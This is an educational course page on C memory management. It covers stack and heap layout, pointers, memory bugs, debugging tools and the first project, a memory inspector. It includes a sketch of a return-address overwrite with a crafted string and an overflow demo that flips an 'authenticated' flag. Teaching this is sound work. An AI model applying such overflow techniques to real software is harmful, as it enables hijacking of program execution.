← Back to all projects

SPRINT 1 REAL WORLD PROJECTS

Sprint 1: Memory & Control - Real World Projects

Goal: Deeply understand memory management and control in C—what memory actually is, why it’s dangerous, how to master it, and why this knowledge is the foundation of all systems programming.


Project Overview Table

| # | Project | Core Topics Covered | Difficulty | |—|———|———————|————| | 1 | Memory Inspector Tool | Pointers & Addresses, Stack vs Heap Visualization, Memory Layout, %p Formatting, lldb Debugging | Intermediate | | 2 | Safe String Library | C String Internals, Null Terminators, Buffer Overflow Prevention, Bounds Checking, Pointer Arithmetic | Intermediate | | 3 | Memory Leak Detector | malloc/free Tracking, Memory Leaks, Double-Free Detection, Use-After-Free, Object Lifetime & Ownership | Intermediate | | 4 | Arena Allocator | Bump Allocation, Custom Allocators, mmap System Call, Memory Alignment, O(1) Allocation/Bulk-Free | Intermediate | | 5 | Exploit Lab (Buffer Overflow) | Buffer Overflow Exploitation, Stack Frame Layout, Return Address Overwriting, ASLR/Canaries/NX, Security Mitigations | Advanced | —

Why Memory & Control Matters

In 1972, Dennis Ritchie created C at Bell Labs to rewrite Unix. His design choice was radical: give programmers direct access to memory addresses. No safety net. No garbage collector. Just raw power and raw responsibility.

That decision shaped the next 50 years of computing:

  • The Linux kernel (30+ million lines of C) runs on 96.3% of the world’s top 1 million web servers
  • Every major security vulnerability you’ve heard of—Heartbleed, Shellshock, the Morris Worm—exploited C memory bugs
  • CVE statistics: ~70% of security vulnerabilities in Microsoft and Google products are memory safety issues
  • The billion-dollar bugs: Buffer overflows alone have caused estimated damages in the tens of billions of dollars

Why does C remain dominant despite these dangers? Because understanding memory is understanding computing:

High-level abstraction          What you think happens
        ↓
    let x = [1, 2, 3]     →     "Create an array"
        ↓
Low-level reality               What actually happens
        ↓
    malloc(12)            →     Ask OS for 12 bytes at address 0x7f3a...
    *(int*)ptr = 1        →     Write 00000001 to bytes 0-3
    *(int*)(ptr+4) = 2    →     Write 00000002 to bytes 4-7
    *(int*)(ptr+8) = 3    →     Write 00000003 to bytes 8-11

High-Level Abstraction vs Low-Level Reality

Every Python list, every JavaScript object, every Rust Vec—underneath, it’s all pointers and bytes. Languages just hide this from you. C shows you the truth.

The Memory Hierarchy: What You’re Really Working With

Memory Hierarchy Diagram

When you write int x = 42;, you’re not just “storing a number”—you’re participating in this entire hierarchy. Understanding this is why C programmers can make software 10-100x faster than naive implementations.


Core Concept Analysis

The Big Picture: A Process’s Memory Layout

When your program runs, the operating system gives it a virtual address space. Here’s what it looks like:

High addresses (0xFFFFFFFF...)
┌────────────────────────────┐
│         Kernel Space       │  ← You can't touch this
│    (OS code and data)      │
├────────────────────────────┤ 0x7FFF...
│                            │
│          Stack             │  ← Local variables, return addresses
│            ↓               │    Grows DOWN toward lower addresses
│                            │
│         (empty)            │
│                            │
│            ↑               │
│          Heap              │  ← malloc'd memory
│                            │    Grows UP toward higher addresses
├────────────────────────────┤
│          BSS               │  ← Uninitialized global variables
├────────────────────────────┤
│          Data              │  ← Initialized global variables
├────────────────────────────┤
│          Text              │  ← Your compiled code (read-only)
└────────────────────────────┘
Low addresses (0x00000000...)

Process Virtual Memory Layout

Every C program you write operates within this structure. Let’s break down each region:

1. The Stack: Automatic Memory Management

The stack is where local variables live. It’s called a “stack” because it works exactly like a stack of plates:

void foo() {
    int a = 1;        // Pushed onto stack
    int b = 2;        // Pushed onto stack
    bar();            // bar's frame pushed on top
}                     // a and b automatically "popped" (destroyed)

Stack during foo():
┌─────────────────────┐ High addresses
│   Return address    │  ← Where to go after foo() returns
├─────────────────────┤
│   Saved registers   │  ← Previous function's state
├─────────────────────┤
│   int b = 2         │  ← Local variable
├─────────────────────┤
│   int a = 1         │  ← Local variable
├─────────────────────┤
│   ...               │
└─────────────────────┘ Low addresses (stack grows down)

Stack Frame During foo()

Key insight: The stack is fast (just move a pointer) but limited (~8MB default on Linux). It’s also ephemeral—when a function returns, its stack frame is gone. That’s why returning a pointer to a local variable is undefined behavior.

2. The Heap: Manual Memory Management

The heap is where malloc() gets memory. Unlike the stack, you control when memory is allocated and freed:

int* create_array(int size) {
    int* arr = malloc(size * sizeof(int));  // Ask heap for memory
    return arr;                              // Valid! Heap memory persists
}                                            // But who frees it?
Heap layout (simplified):
┌────────────────────────────────────────────┐
│ Header │         User Data                 │ ← malloc(100)
│ 8 bytes│         100 bytes                 │
├────────┼───────────────────────────────────┤
│ Header │  Free space (fragmented)          │ ← Was freed
├────────┼───────────────────────────────────┤
│ Header │         User Data                 │ ← malloc(50)
│ 8 bytes│         50 bytes                  │
└────────┴───────────────────────────────────┘

Heap Layout

Key insight: Every malloc() adds metadata (size, in-use flag). That’s why free() knows how much to deallocate. Corrupt this metadata, and you corrupt the heap allocator itself.

3. Pointers: Just Numbers That Are Addresses

A pointer is not magic. It’s just a number that happens to be interpreted as a memory address:

int x = 42;
int* p = &x;

// What's actually happening:
// x lives at address 0x7ffeefbff4ac
// p contains the VALUE 0x7ffeefbff4ac
// *p means "go to that address and read the int there"

printf("Value of p: %p\n", (void*)p);     // 0x7ffeefbff4ac
printf("Value of *p: %d\n", *p);           // 42
printf("Value of x: %d\n", x);             // 42

Pointer arithmetic follows type sizes:

int arr[3] = {10, 20, 30};
int* p = arr;

p + 1  // Not "address + 1 byte"
       // It's "address + sizeof(int) bytes"
       // So p + 1 points to arr[1], not some random byte

Pointer Arithmetic Visualization:

Memory Addresses and Values (int = 4 bytes):

Address:     0x1000         0x1004         0x1008         0x100C
             ┌──────────┐   ┌──────────┐   ┌──────────┐   ┌──────────┐
Value:       │    10    │   │    20    │   │    30    │   │  (next)  │
             └──────────┘   └──────────┘   └──────────┘   └──────────┘
                  ▲              ▲              ▲
                  │              │              │
                  p            p+1            p+2

Key Insight: p + 1 moves by sizeof(int) = 4 bytes, NOT 1 byte!

If p were a char*:
Address:     0x1000    0x1001    0x1002    0x1003
             ┌─────┐   ┌─────┐   ┌─────┐   ┌─────┐
Value:       │ 'A' │   │ 'B' │   │ 'C' │   │ 'D' │
             └─────┘   └─────┘   └─────┘   └─────┘
                ▲         ▲
                │         │
                p       p+1

Now p + 1 moves by sizeof(char) = 1 byte

Pointer Arithmetic Visualization

Every memory bug falls into a few categories. Understanding them is understanding why C is dangerous:

Buffer Overflow

char buffer[10];
strcpy(buffer, "This string is way too long!");
// Overwrites memory PAST the buffer
// Could overwrite return address → attacker controls execution

Buffer Overflow Stack Corruption - Step by Step:

STEP 1: Normal Stack Frame BEFORE strcpy
========================================
Function: vulnerable()
  char buffer[10];
  strcpy(buffer, "This string is way too long!");

Stack Layout:
High Addresses (grows DOWN)
┌──────────────────────────┐
│  Return Address          │  ← 0x7fff5000  Where to go after function returns
│  (points to caller)      │               (e.g., 0x400123)
├──────────────────────────┤
│  Saved Frame Pointer     │  ← 0x7fff4ff8
├──────────────────────────┤
│  buffer[9]               │  ← 0x7fff4ff0
│  buffer[8]               │
│  buffer[7]               │
│  buffer[6]               │
│  buffer[5]               │
│  buffer[4]               │
│  buffer[3]               │
│  buffer[2]               │
│  buffer[1]               │
│  buffer[0]               │  ← 0x7fff4fe6  (buffer starts here)
├──────────────────────────┤
│  (other locals)          │
└──────────────────────────┘
Low Addresses

STEP 2: During strcpy - Bytes Being Written
============================================
Source: "This string is way too long!\0"  (30 bytes!)
Dest:   buffer (only 10 bytes allocated!)

┌──────────────────────────┐
│  Return Address          │  ← Will be OVERWRITTEN!
│  0x400123 → 0x676E6F6C  │     (becomes "long" in ASCII!)
├──────────────────────────┤
│  Saved Frame Pointer     │  ← Will be OVERWRITTEN!
│  → 0x6F742079            │     (becomes "y to" in ASCII!)
├──────────────────────────┤
│  'g' '!' '\0' [overflow] │  ← PAST END OF BUFFER
│  'n' 'o' 'l' ' '         │  ← PAST END OF BUFFER
│  'o' 't' ' ' 'y'         │  ← PAST END OF BUFFER
│  's' ' ' 'w' 'a'         │
│  'T' 'h' 'i' 's'         │  ← buffer[0-9] (valid)
├──────────────────────────┤

STEP 3: After strcpy - CORRUPTED!
==================================
┌──────────────────────────┐
│  Return Address          │
│  0x676E6F6C ("long")     │  ← CORRUPTED! Not a valid code address
├──────────────────────────┤
│  Saved Frame Pointer     │
│  0x6F742079              │  ← CORRUPTED!
├──────────────────────────┤
│  'g' '!' '\0'            │
│  'n' 'o' 'l' ' '         │
│  'o' 't' ' ' 'y'         │
│  's' ' ' 'w' 'a'         │
│  'T' 'h' 'i' 's'         │
└──────────────────────────┘

STEP 4: When Function Returns - CRASH!
=======================================
CPU tries to:
  1. Pop return address from stack → gets 0x676E6F6C
  2. Jump to that address
  3. 0x676E6F6C is NOT valid executable code!
  4. SEGMENTATION FAULT!

With a carefully crafted exploit:
  strcpy(buffer, "AAAAAAAAAA" + "\xef\xbe\xad\xde");
                  ↑ 10 bytes      ↑ Attacker's address

  Return address becomes 0xdeadbeef → attacker controls execution!

Buffer Overflow Stack Corruption

Use-After-Free

int* p = malloc(sizeof(int));
*p = 42;
free(p);
// p still contains the old address, but memory is now "free"
*p = 100;  // UNDEFINED! Memory might be reused

Memory Bug Lifecycle - Use-After-Free Timeline:

Timeline of a Use-After-Free Bug:

T=0: Allocation
     ┌──────────────────────┐
     │ int* p = malloc(...) │──┐
     └──────────────────────┘  │
                               ▼
     Heap: [p → 0x1000] → ┌─────────┐
                          │   42    │  Status: VALID
                          └─────────┘

T=1: Use (OK)
     ┌────────┐
     │ *p = 42│  ✓ Works fine
     └────────┘

T=2: Free
     ┌──────────┐
     │ free(p)  │──┐
     └──────────┘  │
                   ▼
     Heap: [p → 0x1000] → ┌─────────┐
                          │   42    │  Status: FREED (memory returned to allocator)
                          └─────────┘
                          p is now a DANGLING POINTER!

T=3: Reuse (somewhere else in program)
     ┌────────────────────────────┐
     │ char* s = malloc(4);       │──┐
     │ strcpy(s, "ABC");          │  │
     └────────────────────────────┘  ▼
     Heap: [s → 0x1000] → ┌─────────┐
           [p → 0x1000] → │  "ABC"  │  SAME ADDRESS REUSED!
                          └─────────┘

T=4: Use-After-Free BUG!
     ┌─────────┐
     │ *p = 100│  ← Writing to freed memory!
     └─────────┘
           │
           ▼
     Heap: [s → 0x1000] → ┌─────────┐
           [p → 0x1000] → │   100   │  CORRUPTED s's data!
                          └─────────┘

     Result: Undefined behavior! Could:
     - Silently corrupt other data (like above)
     - Crash immediately
     - Work fine (memory not yet reused) ← WORST: bug appears later!
     - Security vulnerability (attacker controls what's at that address)

Use-After-Free Timeline

Double-Free

int* p = malloc(sizeof(int));
free(p);
free(p);  // Heap allocator's metadata is now corrupted
          // Next malloc might return garbage

Double-Free Heap Corruption:

How Double-Free Corrupts the Heap Allocator:

INITIAL STATE - Normal Heap:
┌────────────────────────────────────────────────────┐
│ Header: size=16, in_use=1 │  User Data (p points  │
│         prev=NULL          │  here)                │
├────────────────────────────────────────────────────┤
│ Header: size=32, in_use=1 │  Other allocation     │
└────────────────────────────────────────────────────┘

AFTER FIRST free(p) - Correct:
┌────────────────────────────────────────────────────┐
│ Header: size=16, in_use=0 │  Free block           │  ← Added to free list
│         next_free → ...    │  (available for      │
│         prev_free → ...    │   reuse)             │
├────────────────────────────────────────────────────┤
│ Header: size=32, in_use=1 │  Other allocation     │
└────────────────────────────────────────────────────┘

Free List: HEAD → [Block at p] → [Other free blocks] → NULL

AFTER SECOND free(p) - CORRUPTED:
┌────────────────────────────────────────────────────┐
│ Header: CORRUPTED!         │  Double-freed block  │
│         next_free → ITSELF │  ← Creates loop or   │
│         prev_free → ???    │     invalid pointers │
├────────────────────────────────────────────────────┤
│ Header: size=32, in_use=1 │  Other allocation     │
└────────────────────────────────────────────────────┘

Free List: HEAD → [Block at p] → [Block at p] → ∞ LOOP!
                        ↓               ↑
                        └───────────────┘

CONSEQUENCES:
1. Free list is now circular or has invalid pointers
2. Next malloc() might:
   - Return the same address twice → two pointers to same memory
   - Crash when traversing corrupted free list
   - Return garbage/invalid addresses
3. Heap metadata is corrupted → future mallocs are unpredictable
4. Security risk: Attacker can exploit to write arbitrary memory

Example of the damage:
  int* a = malloc(16);     // Might get address 0x1000
  int* b = malloc(16);     // Might ALSO get 0x1000! (same memory!)
  *a = 42;
  *b = 100;
  printf("%d\n", *a);      // Prints 100! (a and b are aliased)

Double-Free Heap Corruption

Memory Leak

void leak() {
    int* p = malloc(1000);
    // Function returns without free(p)
    // Those 1000 bytes are now unreachable but still allocated
}
// Call leak() 1000 times → 1MB of leaked memory

5. Why C Doesn’t Protect You

Other languages prevent these bugs through:

Language Protection Mechanism
Java/Go Garbage collector (no manual free)
Rust Ownership system (compile-time checks)
Python Reference counting + GC
JavaScript GC + no pointer arithmetic

C gives you none of this. Why?

  1. Performance: Every safety check costs cycles
  2. Control: Sometimes you NEED to do “unsafe” things (OS kernels, device drivers)
  3. Simplicity: C’s model maps directly to hardware
  4. History: C was designed when computers had 64KB of RAM

The tradeoff: C trusts you completely. With that trust comes power—and responsibility.


Tools for Seeing Memory

You can’t master what you can’t observe. These tools make memory visible:

1. lldb/gdb: The Debugger

$ lldb ./my_program
(lldb) breakpoint set --name main
(lldb) run
(lldb) frame variable           # Show local variables
(lldb) memory read &x           # Show raw bytes at address of x
(lldb) register read            # Show CPU registers

2. AddressSanitizer: The Bug Finder

$ clang -fsanitize=address -g my_program.c -o my_program
$ ./my_program
# If there's a memory bug, you get a detailed report:
# ==12345==ERROR: AddressSanitizer: heap-use-after-free
# READ of size 4 at 0x602000000010

3. Valgrind: The Memory Profiler

$ valgrind --leak-check=full ./my_program
# Reports all memory leaks, invalid reads/writes
# Slower but catches more bugs

4. printf debugging (sometimes the best tool)

printf("x is at %p, value = %d\n", (void*)&x, x);
printf("p is at %p, points to %p, *p = %d\n", (void*)&p, (void*)p, *p);

Concept Summary Table

Concept Cluster What You Need to Internalize
Memory as bytes Memory is just numbered boxes. Everything is bytes with interpretation layered on top.
The stack Automatic, fast, limited. Local variables live here. Grows down. LIFO.
The heap Manual, flexible, fragmentation-prone. malloc/free. You control lifetime.
Pointers as addresses A pointer is just a number that happens to be an address. Arithmetic follows type sizes.
Ownership & lifetime Who “owns” memory? When does it become invalid? Why can’t the compiler always know?
Failure modes Buffer overflow, use-after-free, double-free, memory leak—these aren’t abstract, they’re observable.
Tooling lldb and sanitizers show you what’s actually happening vs. what you think is happening.

Deep Dive Reading by Concept

This section maps each concept from above to specific book chapters for deeper understanding. Read these before or alongside the projects to build strong mental models.

Memory Fundamentals (What Memory Actually Is)

Concept Book & Chapter
How data is represented in memory Write Great Code, Volume 1 by Randall Hyde — Ch. 2: “Numeric Representation” & Ch. 4: “Floating-Point Representation”
Memory as numbered bytes Computer Systems: A Programmer’s Perspective by Bryant & O’Hallaron — Ch. 2: “Representing and Manipulating Information” (sections 2.1–2.2)
Virtual vs. physical memory Operating Systems: Three Easy Pieces by Arpaci-Dusseau — Part II: “Virtualization” (Ch. 13-15: “Address Spaces”, “Memory API”, “Address Translation”)
How the CPU sees memory Code: The Hidden Language of Computer Hardware and Software by Charles Petzold — Ch. 16: “An Assemblage of Memory” & Ch. 17: “Automation”

The Stack (Automatic Memory)

Concept Book & Chapter
Function call mechanics Computer Systems: A Programmer’s Perspective by Bryant & O’Hallaron — Ch. 3.7: “Procedures”
Stack frames and layout Low-Level Programming by Igor Zhirkov — Ch. 4: “Virtual Memory” & Ch. 5: “Compilation Pipeline” (section on calling conventions)
Why stack grows down The Secret Life of Programs by Jonathan Steinhart — Ch. 5: “Where Am I?” (memory layout)
Recursion and stack overflow C Primer Plus by Stephen Prata — Ch. 9: “Functions” (section on recursion)

The Heap (Manual Memory)

Concept Book & Chapter
How malloc/free work The C Programming Language by Kernighan & Ritchie — Ch. 8.7: “Example—A Storage Allocator”
Heap data structures Computer Systems: A Programmer’s Perspective by Bryant & O’Hallaron — Ch. 9.9: “Dynamic Memory Allocation”
Memory fragmentation C Interfaces and Implementations by David Hanson — Ch. 5: “Arena” & Ch. 6: “Mem”
System calls for memory The Linux Programming Interface by Michael Kerrisk — Ch. 7: “Memory Allocation”

Pointers (The Heart of C)

Concept Book & Chapter
What pointers really are Understanding and Using C Pointers by Richard Reese — Ch. 1: “Introduction” & Ch. 2: “Dynamic Memory Management”
Pointer arithmetic The C Programming Language by Kernighan & Ritchie — Ch. 5: “Pointers and Arrays”
Pointers and arrays relationship Expert C Programming by Peter van der Linden — Ch. 4: “The Shocking Truth: C Arrays and Pointers Are NOT the Same!”
Function pointers C Primer Plus by Stephen Prata — Ch. 14: “Structures and Other Data Forms” (section on function pointers)
Void pointers and casting 21st Century C by Ben Klemens — Ch. 6: “Your Pal the Pointer”

Memory Safety & Vulnerabilities

Concept Book & Chapter
Buffer overflow mechanics Hacking: The Art of Exploitation by Jon Erickson — Ch. 3: “Exploitation” (0x300 sections)
Why C doesn’t protect you Effective C by Robert Seacord — Ch. 2: “Objects, Functions, and Types” & Ch. 7: “Characters and Strings”
Common C security pitfalls Secure Coding in C and C++ by Robert Seacord — Ch. 2: “Strings” & Ch. 4: “Dynamic Memory Management”
Use-after-free and dangling pointers Understanding and Using C Pointers by Richard Reese — Ch. 2: “Dynamic Memory Management” (section on dangling pointers)

Memory Debugging & Tools

Concept Book & Chapter
Using debuggers effectively The Art of Debugging with GDB, DDD, and Eclipse by Matloff & Salzman — Ch. 1-3: Basics of GDB
Understanding memory with lldb Low-Level Programming by Igor Zhirkov — Ch. 6: “Interrupts and System Calls” (debugger sections)
Reading assembly to understand memory Computer Systems: A Programmer’s Perspective by Bryant & O’Hallaron — Ch. 3: “Machine-Level Representation of Programs” (focus on 3.1–3.5)

Process Memory Layout

Concept Book & Chapter
Complete process memory map Computer Systems: A Programmer’s Perspective by Bryant & O’Hallaron — Ch. 9: “Virtual Memory” (especially 9.7-9.8)
ELF format and sections Practical Binary Analysis by Dennis Andriesse — Ch. 2: “The ELF Format”
How programs are loaded The Linux Programming Interface by Michael Kerrisk — Ch. 6: “Processes”

Essential Reading Order

For maximum comprehension, read in this order:

  1. Foundation (Week 1):
    • Computer Systems Ch. 2 (data representation)
    • The C Programming Language Ch. 5 (pointers)
    • Understanding and Using C Pointers Ch. 1-2 (pointer mastery)
  2. Stack & Heap (Week 2):
    • Computer Systems Ch. 3.7 (procedures/stack)
    • Computer Systems Ch. 9.9 (dynamic allocation)
    • The C Programming Language Ch. 8.7 (allocator example)
  3. Safety & Exploitation (Week 3):
    • Effective C Ch. 7 (strings and safety)
    • Hacking: The Art of Exploitation Ch. 3 (seeing bugs in action)
  4. Deep Understanding (Week 4+):
    • Operating Systems: Three Easy Pieces Part II (virtual memory)
    • C Interfaces and Implementations Ch. 5-6 (allocator design)

Project 1: Memory Inspector Tool

  • File: SPRINT_1_REAL_WORLD_PROJECTS.md
  • Programming Language: C
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 2. The “Micro-SaaS / Pro Tool”
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Memory Management / Systems Programming
  • Software or Tool: Memory Profiler
  • Main Book: “Computer Systems: A Programmer’s Perspective” by Bryant & O’Hallaron

What you’ll build: A command-line tool that visualizes the memory layout of C programs—showing stack frames, heap allocations, variable addresses, and how they change during execution.

Why it teaches memory & control: This forces you to see memory the way lldb sees it. You’ll print addresses, observe stack growth, watch heap fragmentation, and understand that “memory” is just a big array of bytes with conventions layered on top. By building something that displays memory, you have to truly understand what memory is.

Core challenges you’ll face:

  • Printing addresses with %p and understanding what they mean (maps to: what memory is)
  • Observing that stack addresses decrease as you go deeper (maps to: stack layout)
  • Watching heap addresses and understanding malloc return values (maps to: heap layout)
  • Creating a struct and dumping its raw bytes (maps to: bytes & interpretation)
  • Demonstrating what happens when you access freed memory (maps to: use-after-free)

Key Concepts: | Concept | Resource | |———|———-| | Pointer fundamentals | “Understanding and Using C Pointers” Ch. 1-2 - Richard Reese | | Stack vs Heap visualization | LLDB Tutorial - memory read command | | Address interpretation | PDR: LLDB Tutorial - Frame inspection |

Difficulty: Beginner Time estimate: Weekend Prerequisites: Basic C syntax, compiling with gcc/clang


Real World Outcome

When you run your memory inspector tool, you’ll see detailed, educational output showing exactly where variables live in memory and how the stack and heap are organized. Here are real examples of what your tool will produce:

Example 1: Stack vs Heap Visualization

$ ./memory_inspector

=== MEMORY INSPECTOR TOOL ===

[STACK VARIABLES]
Variable 'x' (int):
  Address: 0x7ffeefbff4ac
  Value: 42
  Size: 4 bytes
  Location: STACK (high address)

Variable 'y' (double):
  Address: 0x7ffeefbff4a0
  Value: 3.14159
  Size: 8 bytes
  Location: STACK (high address)

[HEAP ALLOCATIONS]
Pointer 'p' points to:
  Address: 0x600000004000
  Value: 100
  Size: 4 bytes
  Location: HEAP (low address)

Pointer 'arr' points to:
  Address: 0x600000004010
  Values: [1, 2, 3, 4, 5]
  Size: 20 bytes (5 integers)
  Location: HEAP (low address)

[MEMORY LAYOUT DIAGRAM]
High Addresses (Stack)
┌─────────────────────────────────┐
│ 0x7ffeefbff4ac: x = 42          │  ← Stack (automatic storage)
│ 0x7ffeefbff4a0: y = 3.14159     │
└─────────────────────────────────┘
           ... gap ...
┌─────────────────────────────────┐
│ 0x600000004000: *p = 100        │  ← Heap (dynamic allocation)
│ 0x600000004010: arr[0..4]       │
└─────────────────────────────────┘
Low Addresses (Heap)

Stack grows DOWN (toward lower addresses)
Heap grows UP (toward higher addresses)

Example 2: Function Call Stack Frame Inspection

$ ./memory_inspector --show-frames

=== STACK FRAME VISUALIZATION ===

Calling sequence: main() → foo() → bar()

[In bar() - Current Frame]
  Local variable 'z' at 0x7ffeefbff47c = 30
  Stack pointer (approx): 0x7ffeefbff478

[In foo() - Previous Frame]
  Local variable 'y' at 0x7ffeefbff49c = 20
  Return address: 0x400685
  Frame distance from bar: 32 bytes

[In main() - Base Frame]
  Local variable 'x' at 0x7ffeefbff4bc = 10
  Frame distance from foo: 32 bytes

ASCII Stack Layout:
┌────────────────────────────────┐ ← 0x7ffeefbff4c0 (main's frame top)
│  main(): int x = 10            │
│  Return address to OS          │
├────────────────────────────────┤ ← 0x7ffeefbff4a0
│  foo(): int y = 20             │
│  Return address to main        │
├────────────────────────────────┤ ← 0x7ffeefbff480
│  bar(): int z = 30             │   ← Current execution point
│  Return address to foo         │
└────────────────────────────────┘ ← 0x7ffeefbff478 (stack pointer)

Notice: Stack addresses DECREASE as we go deeper into function calls!

Example 3: Memory Corruption Detection

$ ./memory_inspector --demo-corruption

=== BEFORE BUFFER OVERFLOW ===

Buffer location: 0x7ffeefbff490
Buffer contents: "HELLO"
Buffer size: 10 bytes

Target variable 'authenticated': 0x7ffeefbff49e
Value: 0 (FALSE)

Memory layout:
0x7ffeefbff490: [H][E][L][L][O][\0][ ][ ][ ][ ]  ← buffer[10]
0x7ffeefbff49a: [ ][ ][ ][ ]
0x7ffeefbff49e: [00][00][00][00]                 ← authenticated (int)

=== AFTER BUFFER OVERFLOW ===

Wrote 14 bytes to 10-byte buffer!

Memory layout:
0x7ffeefbff490: [H][E][L][L][O][W][O][R][L][D]  ← buffer[10] OVERFLOWED
0x7ffeefbff49a: [!][!][!][!]                     ← Overwrite started here!
0x7ffeefbff49e: [21][21][00][00]                 ← authenticated CORRUPTED!

Target variable 'authenticated': 0x7ffeefbff49e
Value: 8481 (TRUE - CORRUPTED!)

⚠️  WARNING: Buffer overflow detected!
    Bytes written: 14
    Buffer capacity: 10
    Overflow: 4 bytes
    Memory corruption: authenticated variable changed from 0 to 8481

Example 4: Raw Bytes and Endianness

$ ./memory_inspector --show-bytes

=== RAW BYTE INSPECTION ===

Integer: 0x12345678 (305419896 in decimal)
Address: 0x7ffeefbff4ac
Size: 4 bytes

Byte-by-byte breakdown (Little-Endian on x86-64):
  Byte 0 at 0x7ffeefbff4ac: 0x78 (least significant)
  Byte 1 at 0x7ffeefbff4ad: 0x56
  Byte 2 at 0x7ffeefbff4ae: 0x34
  Byte 3 at 0x7ffeefbff4af: 0x12 (most significant)

Memory visualization:
  Lower Address                    Higher Address
  ↓                                ↓
  [78][56][34][12]
   ↑             ↑
   LSB           MSB

Note: On little-endian systems (x86/x64), bytes are stored
      in reverse order - least significant byte first!

Struct padding demonstration:
struct Example {
    char c;      // 1 byte
    // 3 bytes padding
    int i;       // 4 bytes
    char d;      // 1 byte
    // 7 bytes padding
    double d;    // 8 bytes
} ex;

Address: 0x7ffeefbff490
Total size: 24 bytes (not 14!)

Memory layout:
0x7ffeefbff490: [c ][  ][  ][  ]  ← char + 3 padding bytes
0x7ffeefbff494: [i i][i i]        ← int (aligned to 4)
0x7ffeefbff498: [d ][  ][  ][  ]  ← char + 3 padding
0x7ffeefbff49c: [  ][  ][  ][  ]  ← 4 more padding bytes
0x7ffeefbff4a0: [d d d d d d d d]  ← double (aligned to 8)

Wasted space: 10 bytes (41.7% padding!)

These outputs demonstrate that you’ve built a tool that makes the invisible visible - showing exactly how C represents data in memory, where variables live, and how memory corruption happens at the byte level.

Learning milestones:

  1. First milestone: You can explain why &x and x are different, and what *p actually does
  2. Second milestone: You can predict whether a variable is on stack or heap by looking at its address
  3. Final milestone: You instinctively think of memory as numbered bytes, not abstract “variables”

The Core Question You’re Answering

“What IS memory? Where do my variables actually live, and how can I see them?”

Before you write any code, sit with this question. Most developers have a vague sense of “variables” but can’t explain what that actually means at the hardware level. A variable is just a label for a location in a giant array of bytes.


Concepts You Must Understand First

Stop and research these before coding:

  1. Memory as Numbered Bytes
    • What does it mean that memory is “just bytes”?
    • How is an int stored differently than a char?
    • What is the difference between a value and an address?
    • Book Reference: “Computer Systems: A Programmer’s Perspective” Ch. 2 - Bryant & O’Hallaron
  2. The Address-of Operator (&)
    • What does &x actually return?
    • Why is this number different every time you run the program? (ASLR)
    • What’s the relationship between &x and *(&x)?
  3. Pointers as Numbers
    • If a pointer is just a number, what makes it special?
    • What does “dereferencing” mean in terms of hardware operations?
    • Why is int* different from char* if both are just addresses?
    • Book Reference: “Understanding and Using C Pointers” Ch. 1 - Richard Reese
  4. Stack vs Heap Layout
    • Why do stack addresses go downward and heap addresses go upward?
    • What is the “stack pointer”?
    • Why is the stack fast and the heap slow?
    • Book Reference: “Computer Systems: A Programmer’s Perspective” Ch. 3.7 - Bryant & O’Hallaron

Questions to Guide Your Design

Before implementing, think through these:

  1. Displaying Addresses
    • How do you print an address in C? (%p)
    • What format is the address printed in? (Hexadecimal)
    • What does a typical stack address look like vs a heap address?
  2. Visualizing Stack Frames
    • How can you show that calling a function creates a new stack frame?
    • If you call foo() which calls bar(), how do their local variables relate in memory?
    • How do you demonstrate that returning from a function “destroys” its local variables?
  3. Observing Heap Allocations
    • When you call malloc(100), what address do you get?
    • If you call malloc(100) twice, how far apart are the addresses?
    • What happens to those addresses after free()?
  4. Raw Byte Inspection
    • How do you print the individual bytes of an integer?
    • What’s the difference between big-endian and little-endian?
    • How do you see padding bytes in a struct?

Thinking Exercise: Trace Memory by Hand

Before coding, trace this on paper:

void bar() {
    int z = 30;
    printf("z at %p\n", &z);
}

void foo() {
    int y = 20;
    printf("y at %p\n", &y);
    bar();
}

int main() {
    int x = 10;
    printf("x at %p\n", &x);
    foo();

    int* heap = malloc(sizeof(int));
    *heap = 100;
    printf("heap at %p\n", heap);
    free(heap);
}

Questions while tracing:

  • Draw a diagram of the stack at the moment bar() is executing
  • Which address is highest: &x, &y, or &z? Why?
  • Where does the heap allocation fit in your diagram?
  • What happens to &z after bar() returns?

The Interview Questions They’ll Ask

Prepare to answer these:

  1. “What is the difference between &x and x?”
  2. “How can you tell if an address is on the stack or the heap?”
  3. “What happens to a local variable when a function returns?”
  4. “What is a pointer, really?”
  5. “Why does the stack grow downward on x86?”
  6. “What is ASLR and why does it exist?”

Hints in Layers (Only If Stuck)

Hint 1: Start with printf Your first program should just print addresses: ```c int x = 10; printf("x is at address %p\n", (void*)&x); ``` Run it multiple times. Notice how the address changes (ASLR).
Hint 2: Compare Stack Depths Create nested functions and print addresses from each. You'll see addresses decreasing as you go deeper. This shows stack growth direction.
Hint 3: Dump Raw Bytes Cast any variable to `unsigned char*` and print each byte: ```c int x = 0x12345678; unsigned char* bytes = (unsigned char*)&x; for (int i = 0; i < sizeof(int); i++) { printf("Byte %d: 0x%02x\n", i, bytes[i]); } ``` You'll see endianness in action.
Hint 4: Use lldb Compile with `-g` and use lldb to verify your understanding: ``` lldb ./program breakpoint set --name main run frame variable memory read &x ```

Books That Will Help

Topic Book Chapter
What memory really is “Computer Systems: A Programmer’s Perspective” Ch. 2
Pointers from first principles “Understanding and Using C Pointers” Ch. 1-2
Stack and function calls “Computer Systems: A Programmer’s Perspective” Ch. 3.7
Seeing memory with debuggers “The Art of Debugging with GDB, DDD, and Eclipse” Ch. 1-3
Process memory layout “The Linux Programming Interface” Ch. 6

Project 2: Safe String Library

  • File: SPRINT_1_REAL_WORLD_PROJECTS.md
  • Main Programming Language: C
  • Alternative Programming Languages: Rust, Zig, C++
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 1. The “Resume Gold” (Educational/Personal Brand)
  • Difficulty: Level 2: Intermediate (The Developer)
  • Knowledge Area: Memory Safety, Systems Programming
  • Software or Tool: GCC, Valgrind, AddressSanitizer
  • Main Book: “The C Programming Language” - Kernighan & Ritchie

What you’ll build: A bounds-checked string library in C (safe_strlen, safe_strcpy, safe_strcat, safe_substr) that prevents buffer overflows by design.

Why it teaches memory & control: C strings are the perfect teacher for memory danger. Every function forces you to think: “Where does this string end? How big is the destination? What happens if I’m wrong?” By building safe versions, you must first understand exactly how the unsafe versions fail.

Core challenges you’ll face:

  • Finding the null terminator by walking memory byte-by-byte (maps to: string representation)
  • Preventing writes past buffer boundaries (maps to: buffer overflow)
  • Understanding why strcpy(dest, src) has no idea how big dest is (maps to: why C doesn’t protect you)
  • Handling the case where source has no null terminator (maps to: undefined behavior is real)
